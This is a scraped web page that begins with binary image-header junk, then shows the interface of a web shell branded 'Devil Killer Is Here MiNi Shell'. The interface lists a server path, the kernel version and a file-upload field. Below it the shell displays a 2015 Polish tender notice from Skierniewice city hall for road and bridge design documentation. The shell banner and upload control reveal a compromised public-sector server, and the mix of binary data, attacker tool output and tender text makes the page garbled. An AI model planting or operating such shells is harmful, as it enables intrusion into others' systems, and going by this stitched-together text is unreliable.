JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150429/60491-N-2015.html

<p class="kh_header"><b>Skierniewice: Wykonanie dokumentacji projektowych na zadania drogowe</b><br>
<b>Numer ogłoszenia: 60491 - 2015; data zamieszczenia: 29.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych na zadania drogowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Nazwa  i adres Zamawiającego:
Miasto Skierniewice, ul. Rynek 1, 96-100 Skierniewice, strona internetowa: www.bip.um.skierniewice.pl, nr telefonu 0-46 834-51-00    834-51-41     nr faksu  0-46  834-51-45, zwane dalej Zamawiającym, zaprasza do złożenia ofert w przetargu nieograniczonym pn.: Wykonanie dokumentacji projektowych na zadania drogowe.                

2.	Tryb udzielenia zamówienia:
Przetarg nieograniczony przeprowadzany jest na podstawie art. 39 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U 2013 r., poz. 907 ze zmianami) zwaną dalej ustawą.

3.	Opis przedmiotu zamówienia:
3.1	Kod CPV:  
Kod CPV głównego przedmiotu to 74.23.22.00-6 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej.

3.2	Przedmiotem zamówienia jest: Wykonanie dokumentacji projektowych na zadania drogowe, zgodnie z warunkami niniejszej SIWZ.
Zamówienie obejmuje: Wykonanie kompletnych, kompleksowych, wielobranżowych dokumentacji projektowych, wraz z pełnieniem nadzoru autorskiego w trakcie realizacji robót budowlanych na niżej wymienione zadania drogowe i dzieli się na części:

      3.2.1. Część I - Rozbudowa ulicy Strobowskiej 
3.2.2. Część II - Remont mostu w ulicy Prymasowskiej

3.3	W ramach zamówienia określonego w pkt. 3.2 Wykonawca pozyska wszystkie niezbędne opinie, uzgodnienia oraz decyzje administracyjne, w szczególności decyzję o zezwoleniu na realizację inwestycji drogowej lub/i decyzję o pozwoleniu na budowę lub/i dokona skutecznego zgłoszenia budowy (prowadzenia robót budowlanych), pozwolenia wodno-prawne, pozwalające Zamawiającemu na realizację zadań.
 
3.4. Orientacyjny opis zadań inwestycyjnych, na które opracowane mają być dokumentacje projektowe
3.4.1. Rozbudowa ulicy Strobowskiej obejmuje co najmniej:
- wykonanie nowej jezdni (nowa podbudowa i nawierzchnia) o długości około 2,65 km,
- wykonanie ścieżki pieszo-rowerowej o długości około 2,65 km,
- wykonanie chodników, zatok parkingowych , zjazdów do posesji,
- wykonanie zatok postojowych dla autobusów,
- rozbudowę lub przebudowę skrzyżowań z drogami bocznymi,
- wykonanie odwodnienia ulicy. Wstępnie przewiduje się wykonanie kanalizacji deszczowej ze 
  skierowaniem wód do rzeki Łupi lub do zbiorników retencyjnych, a na odcinku ulicy wykonanie 
  rowów odwadniających. Długość kanalizacji deszczowej wyniknie z ustaleń koncepcji odwodnienia 
  z Zamawiającym. Rozwiązanie odwodnienia ulicy nastąpi po jego uzgodnieniu na etapie uzgadniania 
  koncepcji rozwiązań projektowych.   
- wykonanie oświetlenia ulicy na odcinku około 2,65 km: wykonanie nowego oświetlenia (słupów 
  i opraw) oraz przebudowę oświetlenia istniejącego,
- ewentualną przebudowę kolidujących z inwestycją mediów infrastruktury technicznej, w szczególności 
  linii elektroenergetycznej napowietrznej i podziemnej, wodociągu itp.

W ramach opracowania przedmiotu zamówienia Wykonawca pozyska pisemne zgody właścicieli/użytkowników działek prywatnych dotyczące wykonania nowych lub przebudowy istniejących zjazdów do posesji. 
Dla przybliżenia istniejącego wyposażenia terenu i jego otoczenia, załączono mapę zasadniczą (nieaktualną) terenu.

3.4.2. Remont mostu w ulicy Prymasowskiej obejmuje co najmniej:
- rozebranie chodników, nawierzchni asfaltowej jezdni na moście, rozebranie belki podporęczowej 
  i gzymsów, 
  rozebranie schodów - zejść z mostu, rozebranie umocnień stożków i przyczółków, rozebranie balustrad 
  i barier ochronnych,
- wykonanie nowych belek podporęczowych i gzymsów, z wykonaniem kanałów technologicznych dla 
  umieszczenia istniejących mediów infrastruktury technicznej, lub wykonanie systemu podwieszenia dla   
  zainstalowania istniejących mediów infrastruktury technicznej,
- wykonanie izolacji kapy chodnikowej,
- wykonanie nowych chodników o nawierzchni izolowanej z żywic epoksydowych,
- ewentualne wykonanie/remont izolacji na płycie nośnej mostu - w przypadku potrzeby,
- uzupełnienie ubytków w płycie nośnej mostu oraz na podporach mostu, zabezpieczenie antykorozyjne 
  podpór mostu,
- remont skrzydeł mostu,
- umocnienie stożków i podpór skrajnych, 
- wykonanie nowej nawierzchni asfaltowej jezdni na moście i dojazdach,
- wykonanie nowego systemu odwodnienia z nawierzchni mostu z odprowadzeniem wód do rzeki Łupi,
- montaż nowych balustrad i barier lub barieroporęczy na moście i dojazdach,
- wykonanie nowych schodów - zejść z mostu z balustradami,  
- regulacja koryta rzeki pod mostem i na odcinkach wlotowym i wylotowym z umocnieniem brzegów 
  rzeki,
- usunięcie roślinności ze stożków i z bezpośredniego obrębu mostu.

Dla przybliżenia istniejącego wyposażenia terenu i jego otoczenia, załączono mapę zasadniczą (nieaktualną) terenu. Mapa nie zawiera lokalizacji istniejącego kanału - sieci infrastruktury technicznej, która podwieszona jest pod mostem po stronie północnej.

3.5. Projekty i dokumentacje powinny być podzielone na odrębne opracowania w celu uzyskania decyzji administracyjnych, pozwalających na realizację robót budowlanych, u odpowiednich organów administracji państwowej i samorządowej, wg ich kompetencji, w szczególności na odrębne opracowania wynikające z przebiegu granic pasów drogowych dróg: gminnych, powiatowych i wojewódzkich.

3.6. Zakres zadań inwestycyjnych wymienionych w pkt. 3.4. może ulec zmianie, o ile wyniknie to                  z ustaleń i uzgodnień dokonywanych w trakcie wykonywania przedmiotu zamówienia - dokumentacji projektowej, w szczególności ustaleń z Zamawiającym, na etapie uzgadniania koncepcji rozwiązań projektowych.   

3.7.  Zamawiający przewiduje podział gruntów niezbędnych do realizacji inwestycji dla części I zamówienia - zadania wymienionego w pkt. 3.2.1. W przypadku potrzeby podziału gruntów, Wykonawca sporządzi projekty podziału gruntów. 
Zamawiający nie przewiduje podziału gruntów niezbędnych do realizacji inwestycji dla części II zamówienia. 
       
3.8. W zakres dokumentacji projektowych dla zadań wymienionych w pkt. od 3.2.1 i 3.2.2. wchodzą następujące opracowania projektowe: 
a) mapy do celów projektowych (min. 1 egz. w wersji papierowej, 1 egz. w wersji elektronicznej dwg.),
b) dokumentacja geotechniczna badania gruntów (min. 3 egz. w wersji papierowej, 1 egz. w wersji 
elektronicznej) - obligatoryjnie dla części I,  a dla części II - w przypadku takiej potrzeby,  
c) dokumentacja badań istniejącej nawierzchni jezdni ulic, określająca co najmniej rodzaj                   
    i grubość poszczególnych warstw nawierzchni (min. 3 egz. w wersji papierowej, 1 egz. w wersji 
    elektronicznej) - obligatoryjnie dla części I,  a dla części II - w przypadku takiej potrzeby.  
    Dokumentacja ta może być częścią dokumentacji geotechnicznej i jest niezbędna do określenia 
    zakresu robót rozbiórkowych. 
d) materiały do decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia 
    - min. 4 egz. w wersji papierowej, 1 egz. w wersji elektronicznej) - obligatoryjnie dla części I,  a dla 
       części II - w przypadku takiej potrzeby,  
e) dokumentacja do wniosku o wydanie decyzji wodno prawnej, w tym operat wodno-prawny                 (min. 4 egz. w wersji papierowej, 1 egz. w wersji elektronicznej) - w przypadku takiej potrzeby,  
f) koncepcje rozwiązań projektowych zadań drogowych wraz z koncepcją rozwiązania odwodnienia, na 
    podstawie których, po uzgodnieniu ich z Zamawiającym, będzie wykonana dokumentacja projektowa 
    - (min. 1 egz. w wersji papierowej).
g) projekty budowlane lub/i dokumentacje na zgłoszenie budowy (prowadzenia robót budowlanych) - wynikające z przyjętych rozwiązań (6 egz. w wersji papierowej, 1 egz. w wersji elektronicznej). Dotyczy to wszystkich niezbędnych branż. 
h) projekty wykonawcze (6 egz. w wersji papierowej, 1 egz. w wersji elektronicznej) wszystkich niezbędnych branż. 
    Zamawiający dopuszcza możliwość łączenia ze sobą w jedną dokumentację, zawartości projektu budowlanego i zawartości projektu wykonawczego, pod warunkiem, że będzie on zawierał wszystkie niezbędne materiały (rysunkowe i opisowe) niezbędne do prawidłowego wykonania poszczególnych zadań.                                                                                                                                                           
i)  Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót (4 egz. w wersji papierowej, 1 egz.   w wersji elektronicznej) - dotyczy wszystkich branż.
j) projekty stałej zmiany organizacji ruchu (4 egz. w wersji papierowej, 1 egz. w wersji elektronicznej) uzgodnione i zatwierdzone przez Prezydenta Miasta Skierniewice.
k) projekty czasowej zmiany organizacji ruchu (na czas prowadzenia robót) (4 egz. w wersji papierowej,  1egz. w wersji elektronicznej) - uzgodnione w Komendzie Miejskiej Policji w Skierniewicach,
l) przedmiary robót (2 egz. w wersji papierowej, 1 egz. w wersji elektronicznej w formacie exel i norma ath.) - dotyczy wszystkich branż. 
ł) kosztorysy ofertowe (2 egz. w wersji papierowej, 1 egz. w wersji elektronicznej w formacie  exel                  i norma ath.) - dotyczy wszystkich branż,
m) kosztorysy inwestorskie (2 egz. w wersji papierowej, 1 egz. w wersji elektronicznej w formacie  exel lub norma ath.) - dotyczy wszystkich branż,
n) wszystkie niezbędne materiały do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej lub/i do wniosku o wydanie decyzji o pozwoleniu na budowę lub/i dokonania skutecznego zgłoszenia budowy (prowadzenia robót budowlanych) - odpowiednio według potrzeb i w zależności od przyjętych rozwiązań (6 egz. w wersji papierowej, 1 egz. w wersji elektronicznej). Dotyczy to wszystkich niezbędnych branż. 
o) wszystkie inne materiały (raport o oddziaływaniu planowanego przedsięwzięcia drogowego na środowisko - w przypadku potrzeby, projekty, dokumentacje, uzgodnienia) nie wymienione                       a niezbędne dla kompletnego wykonania zamówienia, wynikające z przyjętych rozwiązań przez projektanta.

3.9. Okres gwarancji na wykonany przedmiot zamówienia (dla części I i dla części II) wynosi co najmniej 48 miesięcy licząc od dnia odbioru końcowego przedmiotu umowy. 

3.10. Dokumentacje projektowe powinny odpowiadać wymaganiom technicznym i terminowym            
       określonym w niniejszej SIWZ.

3.11. Zaleca się, aby wykonawca dokonał wizji lokalnej na terenie objętym dokumentacjami projektowymi, w celu oceny lokalnych warunków, a także dokumentów i informacji przekazanych przez Zamawiającego w ramach niniejszego postępowania.

3.12. Wykonawca, w okresie trwania umowy i do dnia zakończenia okresu rękojmi, zobowiązany jest do posiadania polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum:
a) dla części I zamówienia - min. 100 000,00 zł (sto tysięcy złotych),  
b) dla części II zamówienia - min. 20 000 zł (dwadzieścia tysięcy złotych).

Zamawiający wymagał będzie przed podpisaniem umowy przedłożenia polisy OC o wartości uwzględniające powyższe kwoty.   

4.	Oferty częściowe, wariantowe oraz równoważne.
	Zamawiający dopuszcza składanie ofert częściowych wg poniższego wykazu:
4.1. Część I - Rozbudowa ulicy Strobowskiej 
4.2. Część II - Remont mostu w ulicy Prymasowskiej
4.3. Zamawiający nie dopuszcza składania ofert wariantowych ani równoważnych.

5.	Zamówienia uzupełniające
      Zamawiający nie przewiduje zamówień uzupełniających.

6.	Termin wykonania zamówienia
	 Zamówienie należy zrealizować w następujących terminach:
6.1. Część I - Rozbudowa ulicy Strobowskiej - do dnia 15.09.2015r.
6.2. Część II - Remont mostu w ulicy Prymasowskiej - do dnia 30.11.2015r.

Wyżej wymienione terminy dotyczą również pozyskania wszystkich decyzji administracyjnych wykazanych w pkt. 3.3..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium.
1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium:
a) dla części I zamówienia (zadania wymienionego w punkcie 3.2.1) - w wysokości 3 000,00 zł (trzy tysiące złotych),
b) dla części II zamówienia (zadania wymienionego w punkcie 3.2.2) - w wysokości 500,00 zł (pięćset złotych).

2.	Wadium powinno być wniesione przed upływem terminu składania ofert. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, które do terminu składania ofert włącznie, znajdzie się na koncie zamawiającego. Chwilą wpłaty wadium jest chwila wpływu na konto zamawiającego, a nie data złożenia przelewu.
3.	Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6. Ustawy.
4.	Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: 
Powszechna Kasa Oszczędności Bank Polski SA nr: 81 1020 3352 0000 1402 0193 3969  
z dopiskiem: DK - wadium do przetargu pn.: Wykonanie dokumentacji projektowych na zadania drogowe.                
5.	Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym i jego zwrot nastąpi zgodnie z art. 46 ust. 4 ustawy.
6.	Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowych lub ubezpieczeniowych należy złożyć w oryginale w siedzibie zamawiającego w kasie Urzędu Miasta Skierniewice. 
7.	Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 Ustawy.
8.	Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46 ust. 4a i 5 ustawy
9.	Wadium należy wnieść na okres związania ofertą.
10. W przypadku wniesienia wadium w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, jednak zostanie pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

Spełniają warunki określone w art. 22, ust. 1 pkt. 1-4 ustawy Pzp, oraz wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2a ustawy Pzp. 
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki zawarte w SIWZ oraz dostarczą dokumenty i oświadczenia wymagane w SIWZ. 
Informacje dotyczące wymaganych przez Zamawiającego dokumentów i oświadczeń zostały określone  w pkt. 13  SIWZ.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia - Zamawiający uzna, że Wykonawcy spełniają w/w warunek jeżeli dla:
a) Części I zamówienia (wymienionego w punkcie 3.2.1) Wykonawcy wykażą, że w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej dwa opracowania projektowe związane z rozbudową lub budową dróg publicznych, na które Wykonawca w imieniu inwestora lub inwestor, pozyskał decyzję o zezwoleniu na realizację inwestycji drogowej (na podstawie ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych z dnia 10 kwietnia 2003r.), lub decyzję o pozwoleniu na budowę, 
o wartości każdego opracowania minimum 100 000 zł brutto (sto tysięcy złotych brutto).

b) Części II zamówienia (wymienionego w punkcie 3.2.2) Wykonawcy wykażą, że w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej dwa opracowania projektowe związane z remontem, przebudową, budową lub rozbudową obiektu mostowego lub wiaduktu na drogach publicznych, na które Wykonawca w imieniu inwestora lub inwestor, pozyskał decyzję o zezwoleniu na realizację inwestycji drogowej (na podstawie ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych z dnia 10 kwietnia 2003r.), lub decyzję o pozwoleniu na budowę, lub dokonał skutecznego zgłoszenia wykonania robót budowlanych, o wartości każdego opracowania minimum 20 000 zł brutto (dwadzieścia tysięcy złotych brutto).
Na dowód tego wykonawca do oferty winien załączyć: 
W przypadku składania oferty na część I lub część II zamówienia  - Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykaz musi potwierdzać, spełnienie warunku, o którym mowa w punkcie 7.1.2. SIWZ.
Wykaz należy sporządzić wg załącznika nr 5.

Dokumenty potwierdzające, że opracowania projektowe wymienione w punkcie 13.9 zostały wykonane należycie, wraz z podaniem wartości tych zamówień i potwierdzeniem:                                                                      
a) dla części I pozyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub decyzji                             
    o pozwoleniu na budowę,
b) dla części II pozyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub decyzji                            
    o pozwoleniu na budowę lub dokonania zgłoszenia wykonania robót budowlanych.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt. 3 ustawy Pzp, dotyczący dysponowania odpowiednim potencjałem technicznym, jeżeli Wykonawca złoży oświadczenie wg wzoru stanowiącego załącznik nr 3 do SIWZ. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia - Zamawiający uzna, że Wykonawca spełnia w/w warunek jeśli Wykonawca skieruje do wykonania przedmiotu zamówienia - wszystkich dokumentacji projektowych na zadania wymienione w pkt. 3.2 SIWZ, osoby posiadające odpowiednie uprawnienia do projektowania, w szczególności które zgodnie         z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5 poz. 42 z późn. zm.) posiadają odpowiednie uprawnienia projektowe, są członkami właściwej izby samorządu zawodowego oraz posiadają ubezpieczenie od odpowiedzialności cywilnej za szkody, do których może dojść w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie - po przedstawieniu załącznika nr 2 do SIWZ. Na dowód tego wykonawca do oferty winien załączyć: Oświadczenie o uprawnieniach projektantów - wg wzoru stanowiącego załącznik nr 2 do SIWZ.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt. 4 ustawy Pzp, dotyczący sytuacji ekonomicznej i finansowej za spełniony, jeżeli wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum:
a) dla części I zamówienia - min. 100 000,00 zł (sto tysięcy złotych).  
b) dla części II zamówienia - min. 20 000,00 zł (dwadzieścia tysięcy złotych).  

Zamawiający wymagał będzie przed podpisaniem umowy przedłożenia polisy OC o wartości  uwzględniające powyższe kwoty.   
Na dowód tego wykonawca do oferty winien załączyć:
opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie wykonywanej działalności związanej z przedmiotem zamówienia na kwotę minimum: 
a) dla części I zamówienia - min. 100 000,00 zł (sto tysięcy złotych),  
b) dla części II zamówienia - min. 20 000,00 zł (dwadzieścia tysięcy złotych).  
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

